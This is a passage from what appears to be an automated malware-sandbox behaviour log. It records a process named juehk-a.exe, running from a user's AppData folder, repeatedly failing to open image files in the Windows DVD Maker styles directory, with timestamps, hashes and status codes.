26505.          fid (ads:): 0
26506.          failure: open
26507.          ntstatus: 0xc0000022
26508.          CreateOptions: 0x60
26509.        file:
26510.          timestamp: 90651
26511.          mode: failed
26512.          sequenceNumber: 1871
26513.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png
26514.          processinfo:
26515.            pid: 1648
26516.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26517.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26518.            ads:
26519.          fid (ads:): 0
26520.          failure: open
26521.          ntstatus: 0xc0000022
26522.          CreateOptions: 0x60
26523.        file:
26524.          timestamp: 90661
26525.          mode: failed
26526.          sequenceNumber: 1872
26527.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\1047x576black.png
26528.          processinfo:
26529.            pid: 1648
26530.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26531.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26532.            ads:
26533.          fid (ads:): 0
26534.          failure: open
26535.          ntstatus: 0xc0000022
26536.          CreateOptions: 0x60
26537.        file:
26538.          timestamp: 90688
26539.          mode: failed
26540.          sequenceNumber: 1873
26541.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png
26542.          processinfo:
26543.            pid: 1648
26544.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26545.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26546.            ads:
26547.          fid (ads:): 0
26548.          failure: open
26549.          ntstatus: 0xc0000022
26550.          CreateOptions: 0x60
26551.        file:
26552.          timestamp: 90695
26553.          mode: failed
26554.          sequenceNumber: 1874
26555.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png
26556.          processinfo:
26557.            pid: 1648
26558.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26559.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26560.            ads:
26561.          fid (ads:): 0
26562.          failure: open
26563.          ntstatus: 0xc0000022
26564.          CreateOptions: 0x60
26565.        file:
26566.          timestamp: 90701
26567.          mode: failed
26568.          sequenceNumber: 1875
26569.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_SelectionSubpicture.png
26570.          processinfo:
26571.            pid: 1648
26572.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26573.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26574.            ads:
26575.          fid (ads:): 0
26576.          failure: open
26577.          ntstatus: 0xc0000022
26578.          CreateOptions: 0x60
26579.        file:
26580.          timestamp: 90707
26581.          mode: failed
26582.          sequenceNumber: 1876
26583.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png
26584.          processinfo:
26585.            pid: 1648
26586.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26587.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26588.            ads:
26589.          fid (ads:): 0
26590.          failure: open
26591.          ntstatus: 0xc0000022
26592.          CreateOptions: 0x60
26593.        file:
26594.          timestamp: 90714
26595.          mode: failed
26596.          sequenceNumber: 1877
26597.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_SelectionSubpicture.png
26598.          processinfo:
26599.            pid: 1648
26600.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26601.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26602.            ads:
26603.          fid (ads:): 0
26604.          failure: open
26605.          ntstatus: 0xc0000022
26606.          CreateOptions: 0x60
26607.        file:
26608.          timestamp: 90721
26609.          mode: failed
26610.          sequenceNumber: 1878
26611.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png
26612.          processinfo:
26613.            pid: 1648
26614.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26615.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26616.            ads:
26617.          fid (ads:): 0
26618.          failure: open
26619.          ntstatus: 0xc0000022
26620.          CreateOptions: 0x60
26621.        file:
26622.          timestamp: 90727
26623.          mode: failed
26624.          sequenceNumber: 1879
26625.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_SelectionSubpicture.png
26626.          processinfo:
26627.            pid: 1648
26628.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26629.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26630.            ads:
26631.          fid (ads:): 0
26632.          failure: open
26633.          ntstatus: 0xc0000022
26634.          CreateOptions: 0x60
26635.        file:
26636.          timestamp: 90735
26637.          mode: failed
26638.          sequenceNumber: 1880
26639.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png
26640.          processinfo:
26641.            pid: 1648
26642.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26643.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26644.            ads:
26645.          fid (ads:): 0
26646.          failure: open
26647.          ntstatus: 0xc0000022
26648.          CreateOptions: 0x60
26649.        file:
26650.          timestamp: 90743
26651.          mode: failed
26652.          sequenceNumber: 1881
26653.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\1047x576black.png
26654.          processinfo:
26655.            pid: 1648
26656.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26657.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26658.            ads:
26659.          fid (ads:): 0
26660.          failure: open
26661.          ntstatus: 0xc0000022
26662.          CreateOptions: 0x60
26663.        file:
26664.          timestamp: 90748
26665.          mode: failed
26666.          sequenceNumber: 1882
26667.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\15x15dot.png
26668.          processinfo:
26669.            pid: 1648
26670.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26671.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26672.            ads:
26673.          fid (ads:): 0
26674.          failure: open
26675.          ntstatus: 0xc0000022
26676.          CreateOptions: 0x60
26677.        file:
26678.          timestamp: 90754
26679.          mode: failed
26680.          sequenceNumber: 1883
26681.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotsdarkoverlay.png
26682.          processinfo:
26683.            pid: 1648
26684.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26685.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26686.            ads:
26687.          fid (ads:): 0
26688.          failure: open
26689.          ntstatus: 0xc0000022
26690.          CreateOptions: 0x60
26691.        file:
26692.          timestamp: 90759
26693.          mode: failed
26694.          sequenceNumber: 1884
26695.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png
26696.          processinfo:
26697.            pid: 1648
26698.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26699.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26700.            ads:
26701.          fid (ads:): 0
26702.          failure: open
26703.          ntstatus: 0xc0000022
26704.          CreateOptions: 0x60
26705.        file:
26706.          timestamp: 90765
26707.          mode: failed
26708.          sequenceNumber: 1885
26709.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png
26710.          processinfo:
26711.            pid: 1648
26712.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26713.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26714.            ads:
26715.          fid (ads:): 0
26716.          failure: open
26717.          ntstatus: 0xc0000022
26718.          CreateOptions: 0x60
26719.        file:
26720.          timestamp: 90771
26721.          mode: failed
26722.          sequenceNumber: 1886
26723.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_ButtonGraphic.png
26724.          processinfo:
26725.            pid: 1648
26726.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26727.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26728.            ads:
26729.          fid (ads:): 0
26730.          failure: open
26731.          ntstatus: 0xc0000022
26732.          CreateOptions: 0x60
26733.        file:
26734.          timestamp: 90778
26735.          mode: failed
26736.          sequenceNumber: 1887
26737.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_SelectionSubpicture.png
26738.          processinfo:
26739.            pid: 1648
26740.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26741.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26742.            ads:
26743.          fid (ads:): 0
26744.          failure: open
26745.          ntstatus: 0xc0000022
26746.          CreateOptions: 0x60
26747.        file:
26748.          timestamp: 90785
26749.          mode: failed
26750.          sequenceNumber: 1888
26751.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_ButtonGraphic.png
26752.          processinfo:
26753.            pid: 1648
26754.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26756.            ads:
26757.          fid (ads:): 0
26758.          failure: open
26759.          ntstatus: 0xc0000022
26760.          CreateOptions: 0x60
26761.        file:
26762.          timestamp: 90792
26763.          mode: failed
26764.          sequenceNumber: 1889
26765.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png
26766.          processinfo:
26767.            pid: 1648
26768.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26769.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26770.            ads:
26771.          fid (ads:): 0
26772.          failure: open
26773.          ntstatus: 0xc0000022
26774.          CreateOptions: 0x60
26775.        file:
26776.          timestamp: 90798
26777.          mode: failed
26778.          sequenceNumber: 1890
26779.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png
26780.          processinfo:
26781.            pid: 1648
26782.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26783.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26784.            ads:
26785.          fid (ads:): 0
26786.          failure: open
26787.          ntstatus: 0xc0000022
26788.          CreateOptions: 0x60
26789.        file:
26790.          timestamp: 90805
26791.          mode: failed
26792.          sequenceNumber: 1891
26793.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_SelectionSubpicture.png
26794.          processinfo:
26795.            pid: 1648
26796.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26797.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26798.            ads:
26799.          fid (ads:): 0
26800.          failure: open
26801.          ntstatus: 0xc0000022
26802.          CreateOptions: 0x60
26803.        file:
26804.          timestamp: 90811
26805.          mode: failed
26806.          sequenceNumber: 1892
26807.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\pushplaysubpicture.png
26808.          processinfo:
26809.            pid: 1648
26810.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26811.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26812.            ads:
26813.          fid (ads:): 0
26814.          failure: open
26815.          ntstatus: 0xc0000022
26816.          CreateOptions: 0x60
26817.        file:
26818.          timestamp: 90819
26819.          mode: failed
26820.          sequenceNumber: 1893
26821.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_ButtonGraphic.png
26822.          processinfo:
26823.            pid: 1648
26824.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26825.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26826.            ads:
26827.          fid (ads:): 0
26828.          failure: open
26829.          ntstatus: 0xc0000022
26830.          CreateOptions: 0x60
26831.        file:
26832.          timestamp: 90825
26833.          mode: failed
26834.          sequenceNumber: 1894
26835.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_SelectionSubpicture.png
26836.          processinfo:
26837.            pid: 1648
26838.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26839.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26840.            ads:
26841.          fid (ads:): 0
26842.          failure: open
26843.          ntstatus: 0xc0000022
26844.          CreateOptions: 0x60
26845.        file:
26846.          timestamp: 90831
26847.          mode: failed
26848.          sequenceNumber: 1895
26849.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_VideoInset.png
26850.          processinfo:
26851.            pid: 1648
26852.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26853.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26854.            ads:
26855.          fid (ads:): 0
26856.          failure: open
26857.          ntstatus: 0xc0000022
26858.          CreateOptions: 0x60
26859.        file:
26860.          timestamp: 90844
26861.          mode: failed
26862.          sequenceNumber: 1896
26863.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png
26864.          processinfo:
26865.            pid: 1648
26866.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26867.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26868.            ads:
26869.          fid (ads:): 0
26870.          failure: open
26871.          ntstatus: 0xc0000022
26872.          CreateOptions: 0x60
26873.        file:
26874.          timestamp: 90850
26875.          mode: failed
26876.          sequenceNumber: 1897
26877.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png
26878.          processinfo:
26879.            pid: 1648
26880.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26881.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26882.            ads:
26883.          fid (ads:): 0
26884.          failure: open
26885.          ntstatus: 0xc0000022
26886.          CreateOptions: 0x60
26887.        file:
26888.          timestamp: 90857
26889.          mode: failed
26890.          sequenceNumber: 1898
26891.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png
26892.          processinfo:
26893.            pid: 1648
26894.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26895.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26896.            ads:
26897.          fid (ads:): 0
26898.          failure: open
26899.          ntstatus: 0xc0000022
26900.          CreateOptions: 0x60
26901.        file:
26902.          timestamp: 90862
26903.          mode: failed
26904.          sequenceNumber: 1899
26905.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\huemainsubpicture2.png
26906.          processinfo:
26907.            pid: 1648
26908.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26909.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26910.            ads:
26911.          fid (ads:): 0
26912.          failure: open
26913.          ntstatus: 0xc0000022
26914.          CreateOptions: 0x60
26915.        file:
26916.          timestamp: 90869
26917.          mode: failed
26918.          sequenceNumber: 1900
26919.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png
26920.          processinfo:
26921.            pid: 1648
26922.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26923.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26924.            ads:
26925.          fid (ads:): 0
26926.          failure: open
26927.          ntstatus: 0xc0000022
26928.          CreateOptions: 0x60
26929.        file:
26930.          timestamp: 90875
26931.          mode: failed
26932.          sequenceNumber: 1901
26933.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png
26934.          processinfo:
26935.            pid: 1648
26936.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26937.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26938.            ads:
26939.          fid (ads:): 0
26940.          failure: open
26941.          ntstatus: 0xc0000022
26942.          CreateOptions: 0x60
26943.        file:
26944.          timestamp: 90882
26945.          mode: failed
26946.          sequenceNumber: 1902
26947.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png
26948.          processinfo:
26949.            pid: 1648
26950.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26951.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26952.            ads:
26953.          fid (ads:): 0
26954.          failure: open
26955.          ntstatus: 0xc0000022
26956.          CreateOptions: 0x60
26957.        file:
26958.          timestamp: 90888
26959.          mode: failed
26960.          sequenceNumber: 1903
26961.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_SelectionSubpicture.png
26962.          processinfo:
26963.            pid: 1648
26964.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26965.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26966.            ads:
26967.          fid (ads:): 0
26968.          failure: open
26969.          ntstatus: 0xc0000022
26970.          CreateOptions: 0x60
26971.        file:
26972.          timestamp: 90894
26973.          mode: failed
26974.          sequenceNumber: 1904
26975.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_ButtonGraphic.png
26976.          processinfo:
26977.            pid: 1648
26978.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26979.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26980.            ads:
26981.          fid (ads:): 0
26982.          failure: open
26983.          ntstatus: 0xc0000022
26984.          CreateOptions: 0x60
26985.        file:
26986.          timestamp: 90900
26987.          mode: failed
26988.          sequenceNumber: 1905
26989.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_SelectionSubpicture.png
26990.          processinfo:
26991.            pid: 1648
26992.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
26993.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
26994.            ads:
26995.          fid (ads:): 0
26996.          failure: open
26997.          ntstatus: 0xc0000022
26998.          CreateOptions: 0x60
26999.        file:
27000.          timestamp: 90909
27001.          mode: failed
27002.          sequenceNumber: 1906
27003.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\title_stripe.png
27004.          processinfo:
27005.            pid: 1648
27006.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27007.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27008.            ads:
27009.          fid (ads:): 0
27010.          failure: open
27011.          ntstatus: 0xc0000022
27012.          CreateOptions: 0x60
27013.        file:
27014.          timestamp: 90916
27015.          mode: failed
27016.          sequenceNumber: 1907
27017.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\1047x576black.png
27018.          processinfo:
27019.            pid: 1648
27020.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27021.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27022.            ads:
27023.          fid (ads:): 0
27024.          failure: open
27025.          ntstatus: 0xc0000022
27026.          CreateOptions: 0x60
27027.        file:
27028.          timestamp: 90922
27029.          mode: failed
27030.          sequenceNumber: 1908
27031.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png
27032.          processinfo:
27033.            pid: 1648
27034.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27035.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27036.            ads:
27037.          fid (ads:): 0
27038.          failure: open
27039.          ntstatus: 0xc0000022
27040.          CreateOptions: 0x60
27041.        file:
27042.          timestamp: 90927
27043.          mode: failed
27044.          sequenceNumber: 1909
27045.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png
27046.          processinfo:
27047.            pid: 1648
27048.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27049.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27050.            ads:
27051.          fid (ads:): 0
27052.          failure: open
27053.          ntstatus: 0xc0000022
27054.          CreateOptions: 0x60
27055.        file:
27056.          timestamp: 90934
27057.          mode: failed
27058.          sequenceNumber: 1910
27059.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\layers.png
27060.          processinfo:
27061.            pid: 1648
27062.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27063.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27064.            ads:
27065.          fid (ads:): 0
27066.          failure: open
27067.          ntstatus: 0xc0000022
27068.          CreateOptions: 0x60
27069.        file:
27070.          timestamp: 90940
27071.          mode: failed
27072.          sequenceNumber: 1911
27073.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_ButtonGraphic.png
27074.          processinfo:
27075.            pid: 1648
27076.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27077.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27078.            ads:
27079.          fid (ads:): 0
27080.          failure: open
27081.          ntstatus: 0xc0000022
27082.          CreateOptions: 0x60
27083.        file:
27084.          timestamp: 90947
27085.          mode: failed
27086.          sequenceNumber: 1912
27087.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_SelectionSubpicture.png
27088.          processinfo:
27089.            pid: 1648
27090.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27091.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27092.            ads:
27093.          fid (ads:): 0
27094.          failure: open
27095.          ntstatus: 0xc0000022
27096.          CreateOptions: 0x60
27097.        file:
27098.          timestamp: 90955
27099.          mode: failed
27100.          sequenceNumber: 1913
27101.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png
27102.          processinfo:
27103.            pid: 1648
27104.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27105.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27106.            ads:
27107.          fid (ads:): 0
27108.          failure: open
27109.          ntstatus: 0xc0000022
27110.          CreateOptions: 0x60
27111.        file:
27112.          timestamp: 90963
27113.          mode: failed
27114.          sequenceNumber: 1914
27115.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png
27116.          processinfo:
27117.            pid: 1648
27118.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27119.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27120.            ads:
27121.          fid (ads:): 0
27122.          failure: open
27123.          ntstatus: 0xc0000022
27124.          CreateOptions: 0x60
27125.        file:
27126.          timestamp: 90969
27127.          mode: failed
27128.          sequenceNumber: 1915
27129.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_ButtonGraphic.png
27130.          processinfo:
27131.            pid: 1648
27132.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27133.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27134.            ads:
27135.          fid (ads:): 0
27136.          failure: open
27137.          ntstatus: 0xc0000022
27138.          CreateOptions: 0x60
27139.        file:
27140.          timestamp: 90976
27141.          mode: failed
27142.          sequenceNumber: 1916
27143.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_SelectionSubpicture.png
27144.          processinfo:
27145.            pid: 1648
27146.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27147.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27148.            ads:
27149.          fid (ads:): 0
27150.          failure: open
27151.          ntstatus: 0xc0000022
27152.          CreateOptions: 0x60
27153.        file:
27154.          timestamp: 90996
27155.          mode: failed
27156.          sequenceNumber: 1917
27157.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-background.png
27158.          processinfo:
27159.            pid: 1648
27160.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27161.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27162.            ads:
27163.          fid (ads:): 0
27164.          failure: open
27165.          ntstatus: 0xc0000022
27166.          CreateOptions: 0x60
27167.        file:
27168.          timestamp: 91002
27169.          mode: failed
27170.          sequenceNumber: 1918
27171.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-highlight.png
27172.          processinfo:
27173.            pid: 1648
27174.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27175.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27176.            ads:
27177.          fid (ads:): 0
27178.          failure: open
27179.          ntstatus: 0xc0000022
27180.          CreateOptions: 0x60
27181.        file:
27182.          timestamp: 91008
27183.          mode: failed
27184.          sequenceNumber: 1919
27185.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png
27186.          processinfo:
27187.            pid: 1648
27188.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27189.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27190.            ads:
27191.          fid (ads:): 0
27192.          failure: open
27193.          ntstatus: 0xc0000022
27194.          CreateOptions: 0x60
27195.        file:
27196.          timestamp: 91015
27197.          mode: failed
27198.          sequenceNumber: 1920
27199.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png
27200.          processinfo:
27201.            pid: 1648
27202.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27203.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27204.            ads:
27205.          fid (ads:): 0
27206.          failure: open
27207.          ntstatus: 0xc0000022
27208.          CreateOptions: 0x60
27209.        file:
27210.          timestamp: 91021
27211.          mode: failed
27212.          sequenceNumber: 1921
27213.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png
27214.          processinfo:
27215.            pid: 1648
27216.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27217.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27218.            ads:
27219.          fid (ads:): 0
27220.          failure: open
27221.          ntstatus: 0xc0000022
27222.          CreateOptions: 0x60
27223.        file:
27224.          timestamp: 91027
27225.          mode: failed
27226.          sequenceNumber: 1922
27227.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-back-static.png
27228.          processinfo:
27229.            pid: 1648
27230.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27231.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27232.            ads:
27233.          fid (ads:): 0
27234.          failure: open
27235.          ntstatus: 0xc0000022
27236.          CreateOptions: 0x60
27237.        file:
27238.          timestamp: 91041
27239.          mode: failed
27240.          sequenceNumber: 1923
27241.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-next-static.png
27242.          processinfo:
27243.            pid: 1648
27244.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27245.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27246.            ads:
27247.          fid (ads:): 0
27248.          failure: open
27249.          ntstatus: 0xc0000022
27250.          CreateOptions: 0x60
27251.        file:
27252.          timestamp: 91047
27253.          mode: failed
27254.          sequenceNumber: 1924
27255.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-previous-static.png
27256.          processinfo:
27257.            pid: 1648
27258.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27259.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27260.            ads:
27261.          fid (ads:): 0
27262.          failure: open
27263.          ntstatus: 0xc0000022
27264.          CreateOptions: 0x60
27265.        file:
27266.          timestamp: 91053
27267.          mode: failed
27268.          sequenceNumber: 1925
27269.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png
27270.          processinfo:
27271.            pid: 1648
27272.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27273.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27274.            ads:
27275.          fid (ads:): 0
27276.          failure: open
27277.          ntstatus: 0xc0000022
27278.          CreateOptions: 0x60
27279.        file:
27280.          timestamp: 91059
27281.          mode: failed
27282.          sequenceNumber: 1926
27283.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png
27284.          processinfo:
27285.            pid: 1648
27286.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27287.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27288.            ads:
27289.          fid (ads:): 0
27290.          failure: open
27291.          ntstatus: 0xc0000022
27292.          CreateOptions: 0x60
27293.        file:
27294.          timestamp: 91075
27295.          mode: failed
27296.          sequenceNumber: 1927
27297.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png
27298.          processinfo:
27299.            pid: 1648
27300.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27301.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27302.            ads:
27303.          fid (ads:): 0
27304.          failure: open
27305.          ntstatus: 0xc0000022
27306.          CreateOptions: 0x60
27307.        file:
27308.          timestamp: 91082
27309.          mode: failed
27310.          sequenceNumber: 1928
27311.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png
27312.          processinfo:
27313.            pid: 1648
27314.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
27315.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
27316.            ads:
27317.          fid (ads:): 0
27318.          failure: open
27319.          ntstatus: 0xc0000022
27320.          CreateOptions: 0x60
27321.        file:
27322.          timestamp: 91088
27323.          mode: failed
27324.          sequenceNumber: 1929
27325.          value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_content-background.png
27326.          processinfo:
27327.            pid: 1648
